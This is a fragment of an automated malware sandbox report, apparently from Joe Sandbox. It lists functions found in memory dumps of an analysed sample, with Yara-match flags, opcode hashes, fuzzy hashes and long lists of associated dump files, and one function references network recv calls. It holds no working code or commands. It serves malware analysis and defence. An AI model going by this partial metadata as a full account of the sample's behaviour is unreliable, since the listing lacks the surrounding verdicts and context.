                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 70ac5c158aced346a1a9e85f02300b90fd63bfe76017c9ae0ccda17c9764e574
                                                                                                                                                                    • Instruction ID: 2c2e9dc22541507f1a22cef83ee1a6f826b2b965f0170ae1d54c62fd609c2e72
                                                                                                                                                                    • Opcode Fuzzy Hash: 70ac5c158aced346a1a9e85f02300b90fd63bfe76017c9ae0ccda17c9764e574
                                                                                                                                                                    • Instruction Fuzzy Hash: 74118BEF20E024BD7959C1827B38AFE6A6FE5D2730331C82BF806C5109E2944E5A31B1
                                                                                                                                                                    Function 05090C76 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: bf0968be0269b40cfa884a35d068267d29c92146be45e6fe9312abac677999ce
                                                                                                                                                                    • Instruction ID: 0e07eae7a4ec1a53f0bf6a09cca5fa2f713af082033bc7c256d48b344979eb25
                                                                                                                                                                    • Opcode Fuzzy Hash: bf0968be0269b40cfa884a35d068267d29c92146be45e6fe9312abac677999ce
                                                                                                                                                                    • Instruction Fuzzy Hash: D911ACEF10E024BD7959C2427B38AFE666FE5C23307318427F806C6609D2944F4A3171
                                                                                                                                                                    Function 05090CA2 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 437f8b0145475fabe9a1c2b4b5da3bcf31bb2ae8e1cef3ae642bf7a56cdecbf1
                                                                                                                                                                    • Instruction ID: c17e2eccd811eb9d1d26a0aa858ec90718ef5ce0b9fc7306446672ec81abb3d6
                                                                                                                                                                    • Opcode Fuzzy Hash: 437f8b0145475fabe9a1c2b4b5da3bcf31bb2ae8e1cef3ae642bf7a56cdecbf1
                                                                                                                                                                    • Instruction Fuzzy Hash: A301CCAF20F414BEB959D0817B38BFFA76FE6D2330330882BF806C6109D2941A4A3170
                                                                                                                                                                    Function 05090CD8 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: aa0d7b78aa6f6c00b8ae0e74af3d66393b20af7354b67329892c55892b47cef2
                                                                                                                                                                    • Instruction ID: 70e551ec4dce30c1e798183a81f7174c01d3c5f8b983eb7de82b0be62d1452e9
                                                                                                                                                                    • Opcode Fuzzy Hash: aa0d7b78aa6f6c00b8ae0e74af3d66393b20af7354b67329892c55892b47cef2
                                                                                                                                                                    • Instruction Fuzzy Hash: 5B017CAF24F9147D799AC0813A38AFE6B6FE9D2731331C42BF806C514AD2995A4A3131
                                                                                                                                                                    Function 05090CF2 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0bdd0e61816a072305cb26f20713539f0d92921e76db6e0b2d65b3ee6634e25b
                                                                                                                                                                    • Instruction ID: 5e8a90fa5034cae47a0fa45e05d55bd6fb72d456913325988f17ce391f573c1e
                                                                                                                                                                    • Opcode Fuzzy Hash: 0bdd0e61816a072305cb26f20713539f0d92921e76db6e0b2d65b3ee6634e25b
                                                                                                                                                                    • Instruction Fuzzy Hash: 82F03CAF24F515AD75A9D0423B38ABEA66FE4D1731331843BF803C610AE2855A4A3131
                                                                                                                                                                    Function 05090D29 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0cd03f181e74397cf90a6a8a6eab901ba7bc43cc74ba89fa839e71a1b2132240
                                                                                                                                                                    • Instruction ID: a16f748c74943149e250e9ff783b007d9ac205139d21a5bf6e550f98460e7602
                                                                                                                                                                    • Opcode Fuzzy Hash: 0cd03f181e74397cf90a6a8a6eab901ba7bc43cc74ba89fa839e71a1b2132240
                                                                                                                                                                    • Instruction Fuzzy Hash: DDF0FEAF24F5157D7559C0823B38ABEA76FE5D1731331C97BF842C1109D2955A4A3131
                                                                                                                                                                    Function 05090DB3 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1c531f38e8c8c2a7710e2da012352009a0a44c5b18ec1c638afc53c4d8d06323
                                                                                                                                                                    • Instruction ID: 681f223fa502183d645f475929e6fa9b42ef6620db1acadcdedc48c5dd1fa7b8
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c531f38e8c8c2a7710e2da012352009a0a44c5b18ec1c638afc53c4d8d06323
                                                                                                                                                                    • Instruction Fuzzy Hash: A5F05EAF20E5116DB968C0913B2CABE666EE6D6730731C56BF842C610AD2894A4F2131
                                                                                                                                                                    Function 05090D38 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2d1b8dc7d3318c8a0152a669ba5af6275535a7c7e1d16b379f4f414d1b4c5042
                                                                                                                                                                    • Instruction ID: 7d3acb0755445d172a5bf417aed69bdb7efd0649c4a69ef9bc6292ae18b0cb15
                                                                                                                                                                    • Opcode Fuzzy Hash: 2d1b8dc7d3318c8a0152a669ba5af6275535a7c7e1d16b379f4f414d1b4c5042
                                                                                                                                                                    • Instruction Fuzzy Hash: 50F054AF21A5117DB559C5423B38ABFA36EE5D5730375C92BF842C100AD2855A0A2130
                                                                                                                                                                    Function 05090D53 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9f451a203c9f1b199c44757943715b84eb123c7751987e2594169aae7ac8c503
                                                                                                                                                                    • Instruction ID: 8b313e9ea7f7d5b391b42e92f9e6fc9f317a1ef8394f540d3b71ae651f565ad6
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f451a203c9f1b199c44757943715b84eb123c7751987e2594169aae7ac8c503
                                                                                                                                                                    • Instruction Fuzzy Hash: F1F039EF24A5216D7565C0823B28AFEA36FE5D1730331C47BF842C250AE6890A0E3130

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00FF31A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                    • Opcode ID: d7047000286432519d50abb0e01536f82f450014df169eeea90194c440b82909
                                                                                                                                                                    • Instruction ID: 8124245c147ad59985b54bf439bfb333ba2b75f4706bd010b388fac664917d21
                                                                                                                                                                    • Opcode Fuzzy Hash: d7047000286432519d50abb0e01536f82f450014df169eeea90194c440b82909
                                                                                                                                                                    • Instruction Fuzzy Hash: F1C22972E0462C8FDB25CE28DD407AAB3B5EF48354F1441EADA4DE7250E779AE819F40
                                                                                                                                                                    Function 00FBE0C0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • recv.WS2_32(?,?,00000004,00000000), ref: 00FBE10B
                                                                                                                                                                    • recv.WS2_32(?,?,00000008,00000000), ref: 00FBE140
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: recv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1507349165-0
                                                                                                                                                                    • Opcode ID: 64506aefec1ddbd9c9d8956c7ab91b4ac247e8a120d02c3a4f871b8e1ea1dcdc
                                                                                                                                                                    • Instruction ID: 08edbbf3c6b768f8a767b342735c63782dfa482ccd65b24af7cc440cc37e638c
                                                                                                                                                                    • Opcode Fuzzy Hash: 64506aefec1ddbd9c9d8956c7ab91b4ac247e8a120d02c3a4f871b8e1ea1dcdc
                                                                                                                                                                    • Instruction Fuzzy Hash: B731D671E402489BD720CB6DDC81BEB7BBCEB08738F144626F554E7285D67AA8458FA0
                                                                                                                                                                    Function 00FF2D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
